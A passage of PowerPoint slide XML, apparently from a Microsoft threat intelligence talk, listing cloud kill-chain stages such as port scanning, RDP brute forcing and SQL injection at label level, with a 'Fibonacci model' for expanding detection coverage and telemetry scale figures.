          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="40801" tIns="13600" rIns="13600" bIns="13600" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1020" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>    Port Scanning potential victims</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Diagram 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1057986" y="397371"/>
          <a:ext cx="10309568" cy="1037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536207" y="1702594"/>
            <a:ext cx="8831347" cy="356822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="505050"/>
          </a:solidFill>
          <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="505050">
                <a:shade val="50000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="40801" tIns="13600" rIns="13600" bIns="13600" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1020" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t> Installation of RDP brute-forcing tools, email lists installed for spamming, ...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3955387" y="2059415"/>
            <a:ext cx="7412167" cy="356822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="505050"/>
          </a:solidFill>
          <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="505050">
                <a:shade val="50000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="40801" tIns="13600" rIns="13600" bIns="13600" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1020" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>    RDP brute forcing, SQL injection, Elastic Search injection, exploits for known server vulnerabilities, …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5520539" y="2416237"/>
            <a:ext cx="5847015" cy="356822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="44882" tIns="14961" rIns="14961" bIns="14961" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1071" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>  Successful login with brute forced credential, successful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1071" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1071" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>, …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6988375" y="2773059"/>
            <a:ext cx="4379178" cy="356822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0072C6">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="44882" tIns="14961" rIns="14961" bIns="14961" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1071" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>   Malware installed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8423774" y="3129881"/>
            <a:ext cx="2943780" cy="356822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="68217A"/>
          </a:solidFill>
          <a:ln w="17145" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:shade val="95000"/>
                <a:alpha val="50000"/>
                <a:satMod val="150000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="lt1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="44882" tIns="14961" rIns="14961" bIns="14961" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1071" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>   Malware communicates for updates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9765913" y="3486700"/>
            <a:ext cx="1601641" cy="356822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="68217A"/>
          </a:solidFill>
          <a:ln w="17145" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:shade val="95000"/>
                <a:alpha val="50000"/>
                <a:satMod val="150000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="lt1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="44882" tIns="14961" rIns="14961" bIns="14961" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1071" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t> Spam, Bitcoin mining, …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="776927" y="-1"/>
            <a:ext cx="10503666" cy="596488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="93260" tIns="46630" rIns="93260" bIns="46630">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3264" kern="0" dirty="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Exploit any detection to devise cloud kill chain coverage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="13" name="Diagram 12"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1005442" y="2727327"/>
          <a:ext cx="5636282" cy="34874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Explosion 1 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6745290" y="2768356"/>
            <a:ext cx="413179" cy="478919"/>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sz="1836" kern="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4250719" y="3098222"/>
            <a:ext cx="2465702" cy="99369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91031" y="4579676"/>
            <a:ext cx="5966755" cy="2069926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit the “Fibonacci model” to build detection arsenal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 analytic leads to…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 detection. Investigation yields…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 more attack elements. Searching all tenants leads to…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 more affected tenants. Investigating them leads to…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5 new attack elements.  Adding coverage leads to…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…Iterate until the closure of the pivoting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4830895" y="2773058"/>
            <a:ext cx="2089504" cy="382308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A detection fires…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1118671" y="5060098"/>
            <a:ext cx="2432565" cy="1504899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Investigation is performed, identifying:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291436" indent="-291436" defTabSz="932597">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>New analytic ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291436" indent="-291436" defTabSz="932597">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>New TI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Arrow: Down 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="17515388">
            <a:off x="8322245" y="2651418"/>
            <a:ext cx="381000" cy="199007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Arrow: Down 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="6237632">
            <a:off x="4214868" y="1485449"/>
            <a:ext cx="381000" cy="1990075"/>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587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right)">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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right)">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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Graphic spid="13" grpId="0">
        <p:bldAsOne/>
      </p:bldGraphic>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0"/>
      <p:bldP spid="19" grpId="0"/>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38" name="Group 137"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6794828" y="90296"/>
            <a:ext cx="5641647" cy="780533"/>
            <a:chOff x="2408237" y="3505396"/>
            <a:chExt cx="5641647" cy="780533"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139" name="Rectangle 138"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2408237" y="3505396"/>
              <a:ext cx="5568299" cy="780533"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1E1E1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3200" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="140" name="Rectangle 139"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2545787" y="3720314"/>
              <a:ext cx="5504097" cy="523220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="932472" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" spc="-40" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="70796">
                        <a:schemeClr val="bg1"/>
                      </a:gs>
                      <a:gs pos="22000">
                        <a:schemeClr val="bg1"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="1"/>
                  </a:gradFill>
                  <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Value(TI) = f([Aperture X Analysts])</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4677308"/>
            <a:ext cx="12436475" cy="23172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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" spc="-40" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="70796">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                    <a:gs pos="22000">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="1"/>
                </a:gradFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Threat Intelligence System</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" kern="0" spc="-40" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="70796">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                    <a:gs pos="22000">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="1"/>
                </a:gradFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3200" kern="0" spc="-40" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="70796">
                    <a:schemeClr val="bg1"/>
                  </a:gs>
                  <a:gs pos="22000">
                    <a:schemeClr val="bg1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274638" y="4874486"/>
            <a:ext cx="11887199" cy="1855893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="146304" rIns="182880" bIns="146304">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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30" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="23009">
                      <a:srgbClr val="282828"/>
                    </a:gs>
                    <a:gs pos="31481">
                      <a:srgbClr val="282828"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
              </a:rPr>
              <a:t>100+ millions malware detonations per month</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30" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="23009">
                      <a:srgbClr val="282828"/>
                    </a:gs>
                    <a:gs pos="31481">
                      <a:srgbClr val="282828"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
              </a:rPr>
              <a:t>Billions of events from Windows end points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kern="0" spc="-30" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="23009">
                      <a:srgbClr val="282828"/>
                    </a:gs>
                    <a:gs pos="31481">
                      <a:srgbClr val="282828"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="Segoe UI Semilight"/>
              </a:rPr>
              <a:t>300+ million Microsoft Account customers</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-30" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="23009">
                    <a:srgbClr val="282828"/>
                  </a:gs>
                  <a:gs pos="31481">
                    <a:srgbClr val="282828"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
              </a:gradFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Semiligh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30" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="23009">
                      <a:srgbClr val="282828"/>
                    </a:gs>
                    <a:gs pos="31481">
                      <a:srgbClr val="282828"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
